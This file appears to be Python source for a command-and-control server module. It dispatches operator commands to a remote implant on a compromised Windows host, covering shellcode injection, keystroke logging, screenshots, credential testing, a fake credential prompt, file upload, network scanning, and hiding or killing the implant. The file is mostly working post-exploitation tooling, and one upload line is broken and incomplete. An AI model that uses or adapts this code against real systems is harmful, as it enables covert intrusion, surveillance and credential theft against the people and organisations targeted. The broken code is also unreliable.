import base64, re, traceback, os from Alias import cs_alias, cs_replace from Colours import Colours from Utils import randomuri, validate_sleep_time from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid from AutoLoads import check_module_loaded, run_autoloads from Help import sharp_help1 from Config import ModulesDirectory, POSHDIR from Core import readfile_with_completion from Utils import argp, load_file def handle_sharp_command(command, user, randomuri, startup): try: check_module_loaded("Stage2-Core.exe", randomuri, user) except Exception as e: print ("Error loading Stage2-Core.exe: %s" % e) # alias mapping for alias in cs_alias: if alias[0] == command.lower()[:len(command.rstrip())]: command = alias[1] # alias replace for alias in cs_replace: if command.lower().strip().startswith(alias[0]): command = command.replace(alias[0], alias[1]) run_autoloads(command, randomuri, user) if "searchhelp" in command.lower(): searchterm = (command.lower()).replace("searchhelp ","") import string helpful = string.split(sharp_help1, '\n') for line in helpful: if searchterm in line.lower(): print (line) elif "upload-file" in command.lower(): source = "" destination = "" s = "" if command.strip().lower() == "upload-file": source = readfile_with_completion("Location of file to upload: ") while not os.path.isfile(source): print("File does not exist: %s" % source) source = readfile_with_completion("Location of file to upload: ") destination = raw_input("Location to upload to: ") else: args = argp(command) source = args.source destination = args.destination try: with open(source, "rb") as source_file: s = if s: sourceb64 = base64.b64encode(s) destination = destination.replace("\\","\\\\") print ("") print ("Uploading %s to %s" % (source, destination)) uploadcommand = "upload-file%s;\"%s\"" % (sourceb64, destination) new_task(uploadcommand, user, randomuri) else: print("Source file could not be read or was empty") except Exception as e: print ("Error with source file: %s" % e) traceback.print_exc() elif "unhide-implant" in command.lower(): unhide_implant(randomuri) elif "hide-implant" in command.lower(): kill_implant(randomuri) elif "safetydump" in command.lower(): check_module_loaded("SafetyDump.exe", randomuri, user) new_task(command, user, randomuri) elif "inject-shellcode" in command.lower(): params = re.compile("inject-shellcode", re.IGNORECASE) params = params.sub("", command) path = readfile_with_completion("Location of shellcode file: ") try: shellcodefile = load_file(path) if shellcodefile != None: new_task("run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile),params, os.path.basename(path)), user, randomuri) except Exception as e: print ("Error loading file: %s" % e) elif "kill-implant" in command.lower() or "exit" in command.lower(): impid = get_implantdetails(randomuri) ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0]) if ri.lower() == "n": print ("Implant not terminated") if ri == "": new_task("exit", user, randomuri) kill_implant(randomuri) if ri.lower() == "y": new_task("exit",user, randomuri) kill_implant(randomuri) elif "seatbelt " in command.lower(): check_module_loaded("Seatbelt.exe", randomuri, user) new_task(command, user, randomuri) elif (command.lower().startswith("stop-keystrokes")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-keystrokes")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-screenshotmulti")): new_task(command, user, randomuri) elif (command.lower().startswith("get-screenshot")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("arpscan")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("testadcredential")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("testlocalcredential")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("turtle")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-userinfo")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-content")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("resolvednsname")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("resolveip")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("cred-popper")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("get-serviceperms")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("move")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("delete")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower().startswith("ls")): new_task("run-exe Core.Program Core %s" % command, user, randomuri) elif (command.lower() == "pwd") or (command.lower() == "pwd "): new_task("run-exe Core.Program Core pwd", user, randomuri) elif (command.lower() == "ps") or (command.lower() == "ps "): new_task("run-exe Core.Program Core Get-ProcessList", user, randomuri) elif "loadmoduleforce" in command.lower(): params = re.compile("loadmoduleforce ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user, force=True) elif "loadmodule" in command.lower(): params = re.compile("loadmodule ", re.IGNORECASE) params = params.sub("", command) check_module_loaded(params, randomuri, user) elif "listmodules" in command.lower(): modules = os.listdir("%s/Modules/" % POSHDIR) print ("") print ("[+] Available modules:") print ("") for mod in modules: if (".exe" in mod) or (".dll" in mod) : print (mod) new_task(command, user, randomuri) elif "modulesloaded" in command.lower(): ml = get_implantdetails(randomuri) print (ml[14]) elif command.lower() == "help" or command == "?" or command.lower() == "help ": print (sharp_help1) elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "): startup(user) elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower(): new_sleep = command.replace('set-beacon ', '') new_sleep = new_sleep.replace('setbeacon ', '') new_sleep = new_sleep.replace('beacon ', '').strip() if not validate_sleep_time(new_sleep): print(Colours.RED) print("Invalid sleep command, please specify a time such as 50s, 10m or 1h") print(Colours.GREEN) else: new_task(command, user, randomuri) update_sleep(new_sleep, randomuri) elif (command.lower().startswith('label-implant')): label = command.replace('label-implant ', '') update_label(label, randomuri) startup(user) else: if command: new_task(command, user, randomuri) return